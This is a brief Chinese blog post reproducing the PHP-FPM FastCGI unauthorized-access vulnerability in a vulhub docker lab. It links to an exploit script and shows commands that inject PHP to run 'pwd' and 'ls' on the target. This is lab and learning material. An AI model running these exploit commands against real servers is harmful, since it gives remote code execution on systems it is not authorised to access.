PHP-FPM Fastcgi未授权访问漏洞

环境搭建 漏洞复现 网络安全 vulhub PHP
漏洞复现
发布日期:   2022-05-05
文章字数:   157
阅读次数:  

PHP-FPM Fastcgi未授权访问漏洞

漏洞原理

https://www.leavesongs.com/PENETRATION/fastcgi-and-php-fpm.html

环境搭建

cd /vulhub/php/fpm
docker-compose up -d

漏洞复现

https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75

下载上面的那玩意

然后利用

python fpm.py 192.168.3.151 /usr/local/lib/php/PEAR.php

image-20220505210059370

任意命令执行

python fpm.py 192.168.3.151 /usr/local/lib/php/PEAR.php -c '<?php echo `pwd`;?>'

image-20220505210153531

python fpm.py 192.168.3.151 /usr/local/lib/php/PEAR.php -c '<?php echo `ls`;?>'

image-20220505210218025

结束!

文章作者: Broken-year
文章链接: http://Broken-year.github.io/2022/05/05/php-fpm-fastcgi/
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Broken-year !
环境搭建 漏洞复现 网络安全 vulhub PHP
  目录